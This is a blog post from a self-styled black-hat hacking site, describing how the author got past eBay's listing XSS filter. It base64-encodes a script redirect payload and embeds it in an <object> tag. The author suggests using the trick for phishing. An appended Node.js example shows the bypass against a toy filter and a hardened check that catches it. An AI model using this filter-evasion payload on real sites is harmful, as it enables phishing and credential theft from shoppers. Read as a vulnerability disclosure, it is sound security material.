Hello... Go! Black Hat is another blog for Pure Black Hat Hacking Guides.

Bypassing eBay XSS filters to redirect to any other page





In this mail they mentioned that:

If there is any violation against the eBay policy, the listing will be removed and the user account will be suspended.

But I don't believe so, because while I was testing this vulnerability the page was public for 3 days with no account suspension, and they did not even remove the listing. In my experience, 3 days is more than enough to hack someone! I really feel there is no mechanism set up for moderating or checking listings.

This XSS did not reach the cookie disclosure area, but the page could still redirect to another page without any warning, and an iframe could also be injected inside my product listing.

Imagine an attacker listing a product that redirects customers to his phishing page: he can easily grab their credentials. Or, if he simply puts his phishing page in an iframe inside the product listing, he can grab credentials just as easily, and in that case the victim never even leaves the eBay URL shown in the address bar.
Without wasting more of your time, let me tell you straight how I exploited it.

First I tried to inject plain JavaScript like this:

<script>window.location="http://about.me/parv_jain";</script>

Then I got an error like this:



OK, let's make it a bit more complicated for eBay's filters.

Let's base64-encode <script>window.location="http://about.me/parv_jain";</script>

and then it will look like this:
PHNjcmlwdD53aW5kb3cubG9jYXRpb249Imh0dHA6Ly9hYm91dC5tZS9wYXJ2X2phaW4iOzwvc2NyaXB0Pg==
Cool!

Now let's inject this exploit using an <object> tag, and we get something like this:


Nice. Now let's try to put in this small script:


Voilà! The filter can't understand the encoded code, so the payload bypasses it and the item gets listed! :)

And the script actually ran successfully, redirecting to the page I specified!
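As an added example (not from the original post), the following Node.js script reproduces the filter-evasion logic described above against a toy blocklist filter, and shows the check a listing filter would need to catch it: decoding data: URIs before applying the blocklist, or refusing data: URIs in <object>, <embed> and <iframe> altogether. The exact <object> markup the author used is not shown on the page; the `<object data="data:text/html;base64,...">` form, the naiveFilter and hardenedFilter functions, and the sample listings are assumptions for illustration.

```javascript
// Added example, not code from the original post or from eBay.
// Demonstrates why a blocklist that looks for "<script" accepts the same
// payload once it is base64-encoded inside an <object> data: URI, and how a
// filter that decodes data: URIs before checking (or rejects them outright in
// embedding elements) catches it.
// ASSUMPTION: the page does not show the exact <object> tag the author used;
// the data:text/html;base64 form below is the standard way to do this.

// The payload from the post, verbatim.
const PAYLOAD = '<script>window.location="http://about.me/parv_jain";</script>';

// Step 1 of the post: base64-encode the payload.
function toBase64(text) {
  return Buffer.from(text, "utf8").toString("base64");
}

// Step 2 of the post: wrap the encoded payload in an <object> whose data:
// URI is a complete HTML document (assumed markup, see above).
function buildObjectVector(payload) {
  return `<object data="data:text/html;base64,${toBase64(payload)}"></object>`;
}

// Toy blocklist filter (assumed): accepts anything without a literal <script tag.
// Returns true when the listing is accepted.
function naiveFilter(html) {
  return !/<\s*script\b/i.test(html);
}

// Find every data: URI in the markup. Group 1 = media type and parameters
// (e.g. "text/html;charset=utf-8;base64"), group 2 = the encoded body.
const DATA_URI_RE = /data:([^,"'\s]*),([^"'\s>]*)/gi;

function decodeDataUris(html) {
  const found = [];
  for (const m of html.matchAll(DATA_URI_RE)) {
    const [, params, body] = m;
    let decoded;
    try {
      decoded = /;base64$/i.test(params)
        ? Buffer.from(body, "base64").toString("utf8")
        : decodeURIComponent(body);            // percent-encoded data: URIs
    } catch {
      decoded = body;                          // malformed encoding: check the raw body
    }
    found.push({ params, decoded });
  }
  return found;
}

// Hardened filter (assumed): embedding elements may not load data: URIs at
// all, and any data: URI elsewhere is decoded and run through the blocklist.
function hardenedFilter(html) {
  if (/<\s*(object|embed|iframe)\b[^>]*\bdata:/i.test(html)) return false;
  if (!naiveFilter(html)) return false;
  return decodeDataUris(html).every(d => naiveFilter(d.decoded));
}

// Walk through the post's steps with constructed sample listings.
const vector = buildObjectVector(PAYLOAD);
console.log("base64 payload :", toBase64(PAYLOAD));
console.log("plain <script> :", naiveFilter(PAYLOAD) ? "accepted" : "rejected");
console.log("<object> vector:", naiveFilter(vector) ? "accepted (bypass)" : "rejected");
console.log("hardened check :", hardenedFilter(vector) ? "accepted" : "rejected");
```

The first check in hardenedFilter is the one that matters for a marketplace listing: there is no legitimate reason for seller-supplied HTML to embed a data: document in <object>, <embed> or <iframe>, so refusing those outright is simpler and safer than trying to decode and re-scan every encoding an attacker might pick.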


Finally, the video I screen-casted!
